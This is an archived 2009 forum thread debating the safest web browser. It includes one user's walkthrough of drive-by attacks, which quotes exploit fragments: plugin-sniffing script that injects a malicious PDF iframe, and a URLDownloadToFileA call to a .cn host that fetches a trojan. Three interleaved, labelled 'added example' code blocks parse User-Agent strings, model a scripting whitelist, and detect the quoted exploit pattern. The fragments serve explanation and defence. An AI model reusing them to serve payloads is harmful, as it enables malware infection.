View Full Version : Your opinion on the safest browser?
Metal425
April 5th, 2009, 11:57 PM
What is your opinion on the safest browser? I'm using Google Chrome and I love it. I also like Opera, and K-Meleon.
Metal425
April 6th, 2009, 12:06 AM
Wrong section sorry, please move it.
ruinebabine
April 6th, 2009, 07:11 AM
-{ Quote: "What is your opinion on the safest browser? I'm using Google Chrome and I love it. I also like Opera, and K-Meleon." }-
Funny that I precisely have the same happy tapdancers here, but in this order:
1) K-Meleon
2) Opera
3) Chrome (Iron)
All of them under Proxomitron's obligation. I also keep on hand the very portable Off by One for the occasional dog's walk. IE lost me a long while ago and I keep it hoppy as is.
the Tester
April 6th, 2009, 10:21 AM
In my opinion the safest is Opera.
jmonge
April 6th, 2009, 10:43 AM
i use IE 6 and never have any problems;D
n8chavez
April 6th, 2009, 12:02 PM
My vote would go for Opera. I have used them for years and have never had any sort of security issue. On a side note, Proxomitron was mentioned and while it is very good it is for advanced users, meaning you should know what you are doing before messing around with the CSS filters. Otherwise things could start looking very strange.
Creer
April 6th, 2009, 12:29 PM
-{ Quote: "i use IE 6 and never have any problems;D" }-
so you say: no risk no fun? ;D
My vote for Opera :thumb:
cheater87
April 6th, 2009, 01:32 PM
Is this a browser with security add ons aka Noscript, Adblock Plus or just a plain browser with no add ons???
n8chavez
April 6th, 2009, 01:38 PM
-{ Quote: "Is this a browser with security add ons aka Noscript, Adblock Plus or just a plain browser with no add ons???" }-
That is a good point. I would consider AdMuncher, Proxomitron, NoScript, etc. addons. That being said, my vote is the same for both tweaked and out-of-the-box browsers. But the initial question needs to be defined further.
Martijn2
April 6th, 2009, 01:41 PM
I guess the browser targeted the least by criminals is the safest, I would go with Opera (according to Secunia Opera has zero unpatched leaks, but that doesn't say much)
funkydude
April 6th, 2009, 01:42 PM
The safest browser is any sandboxed browser.
n8chavez
April 6th, 2009, 01:51 PM
-{ Quote: "The safest browser is any sandboxed browser." }-
That's true. I recommend Sandboxie to anyone and everyone as the first line of defense. Well little is needed after that, except Shadow Defender.
TopperID
April 6th, 2009, 01:57 PM
-{ Quote: "i use IE 6 and never have any problems;D" }-
I only use IE 6 as my browser.
Plenty of risk, plenty of fun, but never a problem!
With the right security measures it is very difficult to get hit through your browser, whatever one you use. So you may as well use the one you like.
jmonge
April 6th, 2009, 04:15 PM
-{ Quote: "so you say: no risk no fun? ;D
My vote for Opera :thumb:" }-
exactly;) plus i want to zqueez defensewall and malware defender;) i paid to be protected;D well i guez you are correct no risk no fun:)
Osaban
April 6th, 2009, 06:26 PM
-{ Quote: "I only use IE 6 as my browser.
Plenty of risk, plenty of fun, but never a problem!
With the right security measures it is very difficult to get hit through your browser, whatever one you use. So you may as well use the one you like." }-
I agree, and IE8 seems to be even safer than the others. I'm using Chrome because of its speed and simplicity, security depends on other parameters.
Victek123
April 6th, 2009, 06:29 PM
-{ Quote: "What is your opinion on the safest browser? I'm using Google Chrome and I love it. I also like Opera, and K-Meleon." }-
.
I would have a look at IE 8.0 since there are a number of new security features, such as the "screen filter" (enhanced version of the phishing filtering in IE 7). That said I don't think of any browser as being especially secure. They all need to be hardened in every way possible with add-ons, plus a good underlying suite of security applications for the OS.
Eice
April 6th, 2009, 10:29 PM
My vote goes to IE8 and Chrome for their architecture, and Opera for the inherent quality of its code even though it lacks other security mechanisms.
With built-in Protected Mode, anti-XSS defenses, InPrivate Filtering, and a phishing/malware filter that is reportedly more than twice as effective as its closest competitor, IE8 may very well happen to be *gasp* the most secure browser at the moment.
innerpeace
April 6th, 2009, 10:33 PM
This topic has been discussed several times before and I have to agree with funkydude :thumb:.
-{ Quote: "The safest browser is any sandboxed browser." }-
Arup
April 6th, 2009, 10:53 PM
Opera, been using it for years and has never let me down.
bellgamin
April 6th, 2009, 11:54 PM
C'mon folks -- you are all behind the times. The safest and fastest browser -- bar none -- is the amaaazing Lynx (http://lynx.isc.org/). Open source, of course.
(Well... yeah, Lynx is a bit spartan. But the browser's availability of eye-candy wasn't included in the topic's question.) woof! *puppy*
Kees1958
April 7th, 2009, 01:18 AM
-{ Quote: "I only use IE 6 as my browser.
Plenty of risk, plenty of fun, but never a problem!
With the right security measures it is very difficult to get hit through your browser, whatever one you use. So you may as well use the one you like." }-
When I recall correctly, you have great knowledge in protecting the registry (I thought you gave me a few tips years ago when I used Regdefend, thx), so "the right security measure" is a bit a-typical (meaning your registry defense :D :thumb: ) and not available to everyone.
Cheers
TopperID
April 7th, 2009, 03:51 PM
Well yes, if someone doesn't know how to secure a system then they would be better off not using IE 6. However simple patching of windows goes a long way to preventing an exploit succeeding. When enthusiasts go hunting for drive-by malware attacks they always find it necessary to remove the latest patches, even with IE 6, so for the most part people will be safe with a little bit of hardening and common sense.
jmonge
April 7th, 2009, 03:58 PM
yes a hips program will cover me here;)
gery
April 7th, 2009, 04:15 PM
Haven't you guys ever heard of MOZILLA FIREFOX??? ??? ???
Eice
April 7th, 2009, 07:53 PM
-{ Quote: "Haven't you guys ever heard of MOZILLA FIREFOX??? ??? ???" }-
Yes we have, but it's not mentioned here anyway for good reason.
gery
April 8th, 2009, 01:24 AM
I know that you have heard about it but what is the opinion for FF. I like it. It is simple and safe I guess.
Eice
April 8th, 2009, 02:04 AM
-{ Quote: "I know that you have heard about it but what is the opinion for FF. I like it. It is simple and safe I guess." }-
Like its other major competitors, it's a nice browser that will probably serve your needs quite well. It's just that it isn't really a contender when it comes to the question of "safest".
Someone
April 8th, 2009, 08:08 AM
-{ Quote: "Like its other major competitors, it's a nice browser that will probably serve your needs quite well. It's just that it isn't really a contender when it comes to the question of "safest"." }-
Firefox with NoScript should be very safe I think?
BJStone
April 8th, 2009, 08:15 AM
-{ Quote: "I know that you have heard about it but what is the opinion for FF. I like it. It is simple and safe I guess." }-
With or without extensions/add-ons?
BJStone
April 8th, 2009, 08:16 AM
-{ Quote: "Like its other major competitors, it's a nice browser that will probably serve your needs quite well. It's just that it isn't really a contender when it comes to the question of "safest"." }-
So then what are the real contenders when it comes to the question of being "safest" ?
BJStone
April 8th, 2009, 11:37 AM
-{ Quote: "Yes we have, but it's not mentioned here anyway for good reason." }-
Which reason?
ThunderZ
April 8th, 2009, 11:41 AM
Bellgamin hit the nail on the head. :thumb:
Not the most exciting or pretty by far. Far from being well known. But the question concerned secure\security.
Text only is the way to go.
Handries
April 9th, 2009, 02:42 PM
Opera is also my first choice. Right now I'm testing the new Opera 10 Alpha with Turbo, which is quite a bit faster than their previous versions.
For my second choice I'll vote for Maxthon 2.5.2. even though it uses IE 8 as its rendering engine, but has more security features which I like.
Joeythedude
April 9th, 2009, 03:10 PM
Is there much security risk in setting IE 8 as the default browser ?
Does much known malware use the default browser setting when it tries to phone home ?
Toby75
April 9th, 2009, 05:19 PM
Opera, IMO -- less popular than FF so it's less targeted.
nomarjr3
April 10th, 2009, 02:08 AM
FF w/ NoScript, Adblock Plus, and WOT is as safe as a browser can get IMHO.
Never had a security issue since installing those add-ons.;D
100% highly recommended for FF users :thumb:
SweX
April 10th, 2009, 09:43 PM
Hi Guys!
On this site can you see how secure your browser is,
My current browser Safari BETA 4.0 for Windows got good results !-)
http://www.useragentstring.com/
SweX
LoneWolf
April 11th, 2009, 12:12 AM
-{ Quote: "Hi Guys!
On this site can you see how secure your browser is,
My current browser Safari BETA 4.0 for Windows got good results !-)
http://www.useragentstring.com/
SweX" }-
As did Opera here.......
Arup
April 11th, 2009, 12:26 AM
Opera always gets U here, it's one of the most secure and fastest patched browsers there.
Eice
April 11th, 2009, 01:33 AM
-{ Quote: "Hi Guys!
On this site can you see how secure your browser is,
My current browser Safari BETA 4.0 for Windows got good results !-)
http://www.useragentstring.com/
SweX" }-
Sorry, but that's, er, kind of silly.
That site just reports what your useragent string is telling it. It's got nothing to do with how secure your browser actually is.
SweX
April 11th, 2009, 07:57 PM
YES it tells you how secure your useragentstring is yea ::)
And if you don't get the U then it's not secure!
But calling it a "silly" site hmm don't know if it's that silly is it :-\
However, if you know of a browser security tester site that is not "silly"
then you can post it here, thank you.
But this was the best i could do :-*
SweX
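[Added example, not part of any post in this thread.] The "U" discussed above is the encryption-strength field of a Mozilla-style User-Agent string (U = strong, I = weak, N = none), and it is a value the client declares about itself. The sketch below parses that field the way a reporting site could; the function names and the sample User-Agent strings are constructed for illustration.

```javascript
// Added illustration; the User-Agent strings are constructed samples in the
// formats browsers of the period sent.
const TOKENS = { U: "strong encryption", I: "weak encryption", N: "no encryption" };

// Return "U", "I", "N", or null when the string carries no such field.
// The field sits in the first parenthesised comment, separated by ";".
function securityToken(userAgent) {
  const comment = /\(([^)]*)\)/.exec(userAgent);
  if (!comment) return null;
  const field = comment[1]
    .split(";")
    .map((f) => f.trim())
    .find((f) => f === "U" || f === "I" || f === "N");
  return field || null;
}

// Everything a reporting site can say comes from the request header alone.
function siteReport(requestHeaders) {
  const token = securityToken(requestHeaders["user-agent"] || "");
  return { token, meaning: token ? TOKENS[token] : "no token present" };
}

const SAMPLE_REQUESTS = {
  // A Gecko-style string: declares "U".
  firefox3: {
    "user-agent":
      "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8",
  },
  // An IE-style string: the field is simply absent, whatever the patch level.
  ie6: { "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" },
  // Any client can type the header by hand; the report is identical to firefox3.
  handTyped: { "user-agent": "Mozilla/5.0 (Windows; U; anything at all)" },
};

for (const [name, headers] of Object.entries(SAMPLE_REQUESTS)) {
  console.log(name, siteReport(headers));
}
```

The field says nothing about patch level, plugins or configuration, which is why the same report comes back for a real browser and for a hand-typed header.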
L815
April 11th, 2009, 09:33 PM
Any browser can be made safe. Might as well pick one you enjoy using.
Some (like Opera & Chrome) take less work to make safe, when compared to some others (FF).
As a side note, anyone using Chrome?
progress
May 1st, 2009, 03:51 AM
According to this (http://eval.symantec.com/mktginfo/enterprise/white_papers/b-whitepaper_internet_security_threat_report_xiv_04-2009.en-us.pdf) [page 40-41]:
-{ Quote: "In 2008, Symantec documented a total of 419 vulnerabilities in plug-in technologies for Web browsers. Of the total for 2008, 287 vulnerabilities affected ActiveX, which is significantly more than any other plug-in technology." }-
The total number of vulnerabilities affecting the following Web browsers 2008 [page 38]:
-{ Quote: "99 (Mozilla)
47 (Internet Explorer)
40 (Safari)
35 (Opera)
11 (Chrome)" }-
So the safest browsers are: Safari, Opera, Chrome?! ???
Rmus
May 1st, 2009, 04:19 AM
-{ Quote: "With the right security measures it is very difficult to get hit through your browser, whatever one you use. So you may as well use the one you like." }-
-{ Quote: "Any browser can be made safe. Might as well pick one you enjoy using." }-
Nothing more to say, really...
Nonetheless, I'll add that I've tested every exploit site in the wild I've seen mentioned and have yet to find one that has compromised Opera. (Note that I said exploits in the wild, not vulnerabilities listed in surveys).
Now, not all exploits are browser-specific. Those that target applications with plugins for the browser, for example. In these cases, it requires the user to configure the browser properly so that the exploit doesn't bypass the normal Download protection the browser has.
----
rich
Rmus
May 1st, 2009, 04:56 AM
The WinAntiVirus exploit has been called a browser exploit because the fake scan starts automatically, leading to the download of malware.
Typically, the user is redirected from a legitimate website to the fake scan site, which has javascript code such as
script src='fileslist.js'
script src='progressbar2.js'
script src='common.js'
These files load the images for the scan. If scripting is disabled in the browser, the files don't cache, and all the user sees is a blank page:
[attachment 208513]
If scripting is enabled, then the fake stuff starts:
http://www.wilderssecurity.com/attachment.php?attachmentid=202212
Whereupon, the user is confronted with alerts that the computer is worse than a rat's nest because "critical level threats" were not removed, so that this great product is needed to save the day:
http://www.wilderssecurity.com/attachment.php?attachmentid=202207
A brief Quiz:
How does this product get downloaded?
1) The browser does it automatically
2) The user clicks to download.
For those that need to do some research on this, I'll give you some time and return later with the answer.
----
rich
Rmus
May 1st, 2009, 05:32 AM
I hope you agree that the user initiates the download.
So, is WinAntiVirus2009 a browser exploit? Or a user error?
Today's browsers allow you to configure site preferences. In Opera, first you disable Javascript Globally:
[attachment 208516]
Then you enable javascript for your trusted sites - here, Wilders:
[attachment 208514]
This means that any site linked from Wilders will not have Javascript enabled. Here, I click on the link to the article in the post:
[attachment 208515]
So, the WinAntiVirus exploit would fail to initiate with this configuration.
I think this is a great feature. You have to be sympathetic for certain people who might fall for this fake scan trick, if they have no real understanding about these things.
Setting up scripting this way is not difficult to teach, and it certainly will avoid many of the exploits today that require scripting just to start!
----
rich
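[Added example, not part of any post in this thread.] The configuration described above (scripting off globally, on for named trusted sites) comes down to a per-page decision keyed on the host being loaded, not on the page that linked to it. The sketch below models that decision; it is not Opera's implementation, and the policy object, function names and the fake-scan host are constructed for illustration.

```javascript
// Added illustration; not Opera's code. Host names other than the forum's
// own are constructed.

// Policy in the shape the post describes: scripting off globally,
// on only for hosts the user has explicitly trusted.
const policy = {
  globalJavaScript: false,
  trustedHosts: ["wilderssecurity.com"],
};

// True when `host` is the trusted host itself or a subdomain of it.
// Matching on a dot boundary rejects look-alikes such as
// "wilderssecurity.com.fake-scan.example" or "notwilderssecurity.com".
function hostMatches(host, trusted) {
  return host === trusted || host.endsWith("." + trusted);
}

// Decide whether scripts may run on the page at `pageUrl`.
// Only the host of the page being loaded is consulted; the referring page
// plays no part, so a link followed from a trusted site inherits nothing.
function scriptingAllowed(pageUrl, pol) {
  let url;
  try {
    url = new URL(pageUrl);
  } catch (e) {
    return false; // unparseable address: fail closed
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return false;
  const host = url.hostname.toLowerCase().replace(/\.$/, ""); // drop root dot
  if (pol.trustedHosts.some((t) => hostMatches(host, t))) return true;
  return pol.globalJavaScript;
}

// Evaluate a click path: each hop is judged on its own host.
function evaluateClickPath(urls, pol) {
  return urls.map((u) => scriptingAllowed(u, pol));
}

const clickPath = [
  "http://www.wilderssecurity.com/showthread.php", // trusted forum page
  "http://fake-scan.example/scan.html",            // page linked from it
];
console.log(evaluateClickPath(clickPath, policy)); // [ true, false ]
```

With this policy the script files the fake scan page depends on are never run, which matches the blank page shown in the earlier post.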
tlu
May 2nd, 2009, 09:34 AM
-{ Quote: "
So the safest browsers are: Safari, Opera, Chrome?! ???" }-
These figures are rather bogus. Read my answer here (http://www.wilderssecurity.com/showpost.php?p=1418176&postcount=2).
Eice
May 2nd, 2009, 09:50 AM
-{ Quote: "These figures are rather bogus. Read my answer here (http://www.wilderssecurity.com/showpost.php?p=1418176&postcount=2)." }-
With all due respect, the days where Mozilla can tout its security as a selling point over its competitors are long gone. The sooner it can wake up to this and focus on catching up, the better.
demonon
May 2nd, 2009, 01:52 PM
-{ Quote: "With all due respect, the days where Mozilla can tout its security as a selling point over its competitors are long gone. The sooner it can wake up to this and focus on catching up, the better." }-
You still have not explained why you don't think Firefox is a secure browser.
Dogbiscuit
May 2nd, 2009, 02:22 PM
-{ Quote: "With all due respect, the days where Mozilla can tout its security as a selling point over its competitors are long gone. The sooner it can wake up to this and focus on catching up, the better." }-
Maybe you should tell them this. ;)
progress
May 3rd, 2009, 03:12 PM
But Firefox has the best update manager, even ordinary Joe will get all updates :thumb:
Eice
May 3rd, 2009, 03:21 PM
-{ Quote: "But Firefox has the best update manager, even ordinary Joe will get all updates :thumb:" }-
IE, Chrome, Opera, and Safari all come with automatic updates, or at the very least notifications.
Eice
May 3rd, 2009, 09:45 PM
-{ Quote: "You still have not explained why you don't think Firefox is a secure browser." }-
Firefox is reasonably secure, in more or less the same way that IE6 is secure if you keep up with all the security patches. All I'm saying is that Firefox is seriously lagging behind its competitors in this area.
tipstir
May 3rd, 2009, 10:01 PM
-{ Quote: "Yes we have, but it's not mentioned here anyway for good reason." }-
Why is that..?
Eice
May 3rd, 2009, 10:23 PM
-{ Quote: "Why is that..?" }-
Try reading the thread.
progress
May 6th, 2009, 02:49 AM
-{ Quote: "IE, Chrome, Opera, and Safari all come with automatic updates, or at the very least notifications." }-
Look at this (http://www.wilderssecurity.com/showthread.php?t=241393) ::)
arran
May 6th, 2009, 03:09 AM
The safest browser is a browser that is in a Sandbox. Period.
So why not just use a browser that you like the most?
Arup
May 6th, 2009, 04:34 AM
-{ Quote: "Look at this (http://www.wilderssecurity.com/showthread.php?t=241393) ::)" }-
Google is beta so it's a constant process, in case of FF, there were many serious unpatched flaws which needed rectification. Opera has never had a serious hole left open for long, all one needs to do is check Opera's record at Secunia.
progress
May 6th, 2009, 04:43 AM
-{ Quote: "Google is beta so it's a constant process, in case of FF, there were many serious unpatched flaws which needed rectification. Opera has never had a serious hole left open for long, all one needs to do is check Opera's record at Secunia." }-
May be, but: The update process in Safari & Opera is bad because there is no automatic update :thumbd: Ordinary Joe will rarely get an update as you can read in the article ...
Jazz
May 6th, 2009, 01:30 PM
I agree with a number of posters, in that the safest browser is a 'Sandboxed' one.
However, saying that, I use FF (always updated), along with Adblock Plus and NoScript, combined with the MVPS Hosts file (always updated - I utilize HostsXpert), and have never encountered an issue.
Sometimes I might tinker with Sandboxie, if I feel the need to, and very rarely use IE8.
I may even have a look at Opera.
Dogbiscuit
May 6th, 2009, 04:30 PM
You can make a distinction between security (how vulnerable you are if attacked) and safety (how likely you are to be attacked).
Opinions
Someone identified as "DCT" who wrote malware in Russia and was interviewed (http://www.securityfocus.com/news/11476) 2 years ago, suggested people use Opera with scripts and plug-ins disabled in order not to be a victim of an attack with his group's software (MPack).
Charlie Miller (who worked at the NSA for 5 years, co-author of The Mac Hackers Handbook, and a winner at this year's Pwn2Own) stated in an interview (http://blogs.zdnet.com/security/?p=2941) in March that given all the browsers (Opera wasn't included) on all the platforms (Linux also wasn't included) at Pwn2Own this year, he felt the hardest target was Firefox on Windows Vista/7.
Dino A. Dai Zovi (who worked on the Sandia National Laboratories IDART in college, co-authored The Mac Hackers Handbook, and a winner at Pwn2Own 3 years ago) recommended in an interview (http://www.tomshardware.com/reviews/dino-dai-zovi,2260.html) last month that:
-{ Quote: "If security is your highest priority, I would recommend Chrome for any user on any operating system that it supports. Chrome has leap-frogged the other Web browsers in terms of security due to its innovative multi-process sandbox model. Chrome is even more secure on Windows Vista and Windows 7." }-
But he also stated that he personally used Safari for his everyday browsing (for the UI), Firefox on financial sites (for more security), and Chrome running on Vista x64 within a VMWare Fusion VM for secure development - on separate Macs.
Rmus
May 6th, 2009, 06:07 PM
Talk, talk talk...yak,yak, yak... contests...lists...bull-oney -- go to a malicious URL and test. That's the only way to verify an opinion. I try them all, and none are successful.
Any thing other than testing exploits in the wild is irrelevant, and is nothing more than market hype and speculation.
So there!
----
rich
Jazz
May 6th, 2009, 07:17 PM
-{ Quote: "Talk, talk talk...yak,yak, yak... contests...lists...bull-oney -- go to a malicious URL and test. That's the only way to verify an opinion. I try them all, and none are successful.
Any thing other than testing exploits in the wild is irrelevant, and is nothing more than market hype and speculation.
So there!
----
rich" }-
What a mature, intellectual post, I think not.
Engage brain before operating fingers.
If you can't post a sensible, constructive response, then don't bother posting at all.
Rmus
May 6th, 2009, 09:48 PM
What can be more constructive than testing exploits? I gave one example already in a previous post.
----
rich
Kerodo
May 6th, 2009, 10:23 PM
-{ Quote: "What a mature, intellectual post, I think not.
Engage brain before operating fingers.
If you can't post a sensible, constructive response, then don't bother posting at all." }-
You should heed your own words my friend. Rmus' post was probably the only intelligent one yet.
Arup
May 6th, 2009, 10:27 PM
-{ Quote: "May be, but: The update process in Safari & Opera is bad because there is no automatic update :thumbd: Ordinary Joe will rarely get an update as you can read in the article ..." }-
Whenever there is a new version of Opera, an update is offered. I prefer it that way as I might not want my browser to be patched. It's about choice and I would hate it being done behind my back.
innerpeace
May 6th, 2009, 10:37 PM
-{ Quote: "What can be more constructive than testing exploits? I gave one example already in a previous post." }-
Exactly! Then again if we knew how malware worked then we wouldn't have anything to argue about. From reading your posts it looks like the browsers are safe and it's the user or plug ins that are being "exploited".
Do you know of any real examples of a browser vulnerability (old or new) in the wild?
Jazz
May 6th, 2009, 10:42 PM
-{ Quote: "You should heed your own words my friend. Rmus' post was probably the only intelligent one yet." }-
The following is called intelligent??
'...Talk, talk talk...yak,yak, yak... contests...lists...bull-oney --go to a malicious URL and test (stupid, to The extreme) . That's the only way to verify an opinion. I try them all, and none are successful...'
Besides, pretty pictures are one thing................... Proof is another............... ;)
Dogbiscuit
May 7th, 2009, 02:54 AM
-{ Quote: "Talk, talk talk...yak,yak, yak... contests...lists...bull-oney -- go to a malicious URL and test. That's the only way to verify an opinion. I try them all, and none are successful.
Any thing other than testing exploits in the wild is irrelevant, and is nothing more than market hype and speculation.
So there!
----
rich" }-
:blink: :blink: :blink:
Rich,
Unfortunately, we all can't spend our time testing software or studying computer security to the degree necessary. Some of us need to know the opinions and experiences of professionals and others (which therefore aren't completely irrelevant) in order to help us form our own conclusions, such as your own valuable experiences testing real malware.
But how much more experience with in the wild browser exploits do professionals who create or analyze real malware for a living need in order for you not to consider their opinions about browser security and safety 'bull-oney'? ???
They have light-years more experience testing real malware than me, and maybe even more experience than you. :-\
Eice
May 7th, 2009, 03:08 AM
-{ Quote: "They have light-years more experience testing real malware than me, and maybe even more experience than you. ::)" }-
Are their claims reproducible? Verifiable? Can they be tested?
Those men are not scientists speaking about the results of scientific, controlled testing. At best they're offering their opinion. It would be silly to reduce computer security to the level of religion, where the words of the so-called "authorities" are unquestioningly taken as gospel.
Rmus
May 7th, 2009, 03:37 AM
-{ Quote: " From reading your posts it looks like the browsers are safe and it's the user or plug ins that are being "exploited". Do you know of any real examples of a browser vulnerability (old or new) in the wild?" }-
I prefer the phrase, "exploit in the wild" because there are many reported vulnerabilities that never become exploits in the wild. It's just my way of distinguishing what is in the wild and what is not. It's not that I don't pay attention to vulnerabilities, I just don't get too excited about them...
I'm not aware of any exploits in the wild that target code in Opera or Firefox. I can't speak for other browsers. But there are numerous exploits that target IE, and an interesting tactic in use now is to serve up the same trojan in a webpage-based attack using different exploits depending on the user's Browser.
One recently served up a PDF exploit targeting the Acrobat Plugin for Opera and Firefox:
<script
name = navigator.plugins[i].name;
if((name.indexOf("Adobe Acrobat") != -1) || (name.indexOf("Adobe PDF") != -1))
{
document.write ('<i frame src="pdf.pdf"></i frame>');
</script
You can see that with scripting disabled in the Browser, the exploit fails, since the code contains the script tag. To show the payload trojan, I let the exploit run and we can see the code in the PDF file that calls out to download the trojan, load.exe:
URLMON.DLL. URL DownloadToFileA.
http://XXXXXX.cn/load.php?id=4..
http://www.wilderssecurity.com/attachment.php?attachmentid=208020
You can see by the firewall alert and the program that attempts the download that this is an exploit against the Acrobat Plugin and not the browser. Nonetheless, disabling scripting in the browser provides the first layer of protection. Another layer of protection in the browser is to disable the Acrobat Plugins. This, of course, applies to all browsers!
Connecting to the same page with IE, a different exploit targeting IE attempts to download the same trojan:
http://www.wilderssecurity.com/attachment.php?attachmentid=208506&d=1241152145
A quick check at Virus Total showed the two load.exe files to be the same.
I didn't look at the source code, so am not sure which specific exploit against IE this was. Some old ones still in use are:
MS08-041 - ActiveX Control for the Snapshot Viewer Exploit
MS06-014 - Microsoft Data Access Components (MDAC) Function Exploit
The dates (2008, 2006) are when they were patched! That these continue to be used with success says something...
New ones target IE7 but I don't have that version, so I haven't tested. But they are all the same: some weakness in the code (if unpatched) allows for remote code execution, usually to download a trojan.
Another site had 2 different codes for PDF exploits, according to the browser. In addition to the code above for Acrobat Plugins in Opera and Firefox, this was served up to the IE browser:
<script>
function pdfswf()
{
obj = new ActiveXObject(PDF[i]);
document.write ('<i frame src="http://sitesupports.cn/cache/readme.pdf"></i frame>');
You may recognize the reference to ActiveX which will trigger the Acrobat plugin for IE.
I know that it's cool to criticize the IE browser, but right off hand I can think of 3 people who have used IE since at least IE3 or IE4 with no problems. You just have to keep up with things and learn how to properly configure it. They aren't bothered by all of the hoopla against IE. I can imagine at least one retorting to the criticisms,
"Just because his shoes are too tight, why should my feet hurt?"
----
rich
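[Added example, not part of any post in this thread.] The two snippets quoted above share a recognisable shape: an inline script probes for a PDF handler (plugin enumeration or an ActiveX object) and then writes an iframe pointing at a PDF. The sketch below is a static triage check for that shape in saved page source, and it also reports whether the PDF frame exists only inside script text, which is the case where disabling scripting stops the page from ever requesting the file. Indicator names, verdict labels and the sample pages are constructed for illustration.

```javascript
// Added illustration, not code from the thread. Sample pages are constructed
// and inert: they reference no real host and carry no payload.

// Patterns applied to the text of each inline <script> block.
const INDICATORS = [
  { id: "plugin-enumeration", re: /navigator\s*\.\s*plugins/i },
  { id: "acrobat-name-check", re: /indexOf\s*\(\s*["']Adobe (Acrobat|PDF)["']/i },
  { id: "activex-instantiation", re: /new\s+ActiveXObject\s*\(/i },
  { id: "written-pdf-iframe",
    re: /document\s*\.\s*write(?:ln)?\s*\([^)]*<\s*iframe\b[^>]*\bsrc\s*=\s*["'][^"']*\.pdf/i },
];
const STATIC_PDF_FRAME = /<\s*iframe\b[^>]*\bsrc\s*=\s*["'][^"']*\.pdf/i;
// An unterminated script block is scanned to the end of the document.
const SCRIPT_BLOCK = /<script\b[^>]*>([\s\S]*?)(?:<\/script\s*>|$)/gi;

function extractInlineScripts(html) {
  return [...html.matchAll(SCRIPT_BLOCK)].map((m) => m[1]);
}

function triagePage(html) {
  const hits = new Set();
  let probeAndWrite = false;
  for (const script of extractInlineScripts(html)) {
    const local = INDICATORS.filter((i) => i.re.test(script)).map((i) => i.id);
    local.forEach((id) => hits.add(id));
    const probes = local.includes("plugin-enumeration") ||
                   local.includes("activex-instantiation");
    // Strongest signal: probe and PDF-frame write in the same script block.
    if (probes && local.includes("written-pdf-iframe")) probeAndWrite = true;
  }
  const markupOnly = html.replace(SCRIPT_BLOCK, "");
  return {
    verdict: probeAndWrite ? "suspicious" : hits.size > 0 ? "review" : "clean",
    indicators: [...hits].sort(),
    // True when the PDF frame is created only by script, never by static markup.
    needsScripting: hits.has("written-pdf-iframe") && !STATIC_PDF_FRAME.test(markupOnly),
  };
}

// Constructed samples.
const PAGE_PLUGIN_SNIFF = `<html><body><script>
for (var i = 0; i < navigator.plugins.length; i++) {
  var name = navigator.plugins[i].name;
  if ((name.indexOf("Adobe Acrobat") != -1) || (name.indexOf("Adobe PDF") != -1)) {
    document.write('<iframe src="pdf.pdf"></iframe>');
  }
}
</script></body></html>`;
const PAGE_ACTIVEX = `<script>
function pdfswf() {
  var obj = new ActiveXObject("Constructed.ProgID");
  document.write('<iframe src="http://files.example/cache/readme.pdf"></iframe>');
}`; // left unterminated on purpose, like the second quoted snippet
const PAGE_STATIC_PDF =
  `<iframe src="manual.pdf"></iframe><script>document.title = "Manual";</script>`;
const PAGE_FEATURE_CHECK =
  `<script>var hasPlugins = navigator.plugins.length > 0;</script>`;

for (const page of [PAGE_PLUGIN_SNIFF, PAGE_ACTIVEX, PAGE_STATIC_PDF, PAGE_FEATURE_CHECK]) {
  console.log(triagePage(page));
}
```

A "review" verdict on its own is weak: plugin enumeration is also ordinary feature detection, so the combination in one script block is what the check escalates.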
Rmus
May 7th, 2009, 03:50 AM
-{ Quote: "
But how much more experience with in the wild browser exploits do professionals who create or analyze real malware for a living need in order for you not to consider their opinions about browser security and safety 'bull-oney'? ???
They have light-years more experience testing real malware than me, and maybe even more experience than you. ::)" }-
The "bull-oney" was in reference to much of what has been parroted in this thread, not about opinions of experts. Unfortunately, when it comes to browsers, I don't find objective testing of real exploits out there. If there were, you wouldn't find people nitpicking between Firefox and Opera, for example, because both browsers provide a secure and safe experience on the web when configured properly.
That's why I do my own tests and advise people I help accordingly.
----
rich
Jazz
May 7th, 2009, 03:59 AM
-{ Quote: "The "bull-oney" was in reference to much of what has been parroted in this thread, not about opinions of experts. Unfortunately, when it comes to browsers, I don't find objective testing of real exploits out there. If there were, you wouldn't find people nitpicking between Firefox and Opera, for example, because both browsers provide a secure and safe experience on the web when configured properly.
That's why I do my own tests and advise people I help accordingly." }-----
'...because both browsers provide a secure and safe experience on the web when configured properly...
Now, that's a much nicer approach. Exactly my point. Same as IE8, when it's properly configured, he says dubiously.
Rmus
May 7th, 2009, 04:32 AM
-{ Quote: "But how much more experience with in the wild browser exploits do professionals who create or analyze real malware for a living need in order for you not to consider their opinions about browser security and safety 'bull-oney'? ??? " }-
More on this, as two instances come to mind.
One, during the rash of autorun.inf exploits a while back. A respected security analyst was interviewed -- his company had identified a new trojan that was being used in USB attacks. He stated that the exploit could re-enable Autorun if it were disabled on the user's machine. I contacted him about this neat trick: how could the exploit run to re-enable autorun if autorun were disabled, and would he share his analysis, being curious as to how this could take place. He declined, saying that it was proprietary. Finally after several more emails, he said that he had been misquoted by the interviewer. Meanwhile, another AV vendor posted a complete analysis, proving his statement to be incorrect, and it was easily verifiable with a simple test.
Another example, upon the return of the MBR rootkit late last year, Sinowal/Mebroot. A well-respected Security Newsletter editor made this astounding statement:
-{ Quote: "Truth be told, there is no single way to reliably protect yourself from Sinowal/Mebroot, short of disconnecting your computer from the Internet and not opening any files. " }-
I wrote and asked if he were aware that F-Secure had listed all of the web-based exploits in use, and that they were just tried and true drive by attacks, easily blocked by proper protection.
His statement above followed these comments, which explain his reasoning:
-{ Quote: "Your antivirus program may help, for a while. Time and time again, however, Sinowal/Mebroot's creators have modified the program well enough to escape detection." }-
Mired in the old concept that AV is the only protection, you can see his outmoded thinking.
By the way, he also neglected to mention that all of the attacks were against unpatched versions of IE.
So much for (some) security professionals.
You need to be alert and discriminating in what you read.
----
rich
Rmus
May 7th, 2009, 04:36 AM
-{ Quote: "Same as IE8, when it's properly configured, " }-
I understand that IE8 with Vista has many new security features.
----
rich
Dogbiscuit
May 7th, 2009, 05:06 AM
-{ Quote: "The "bull-oney" was in reference to much of what has been parroted in this thread, not about opinions of experts." }-
Since your post came right after mine and the remark about "contests...lists...bull-oney" seemed directed at the Pwn2Own contest, some winners of which I referenced, I couldn't see what else those words referred to but my previous post.
Sorry if I misunderstood you.
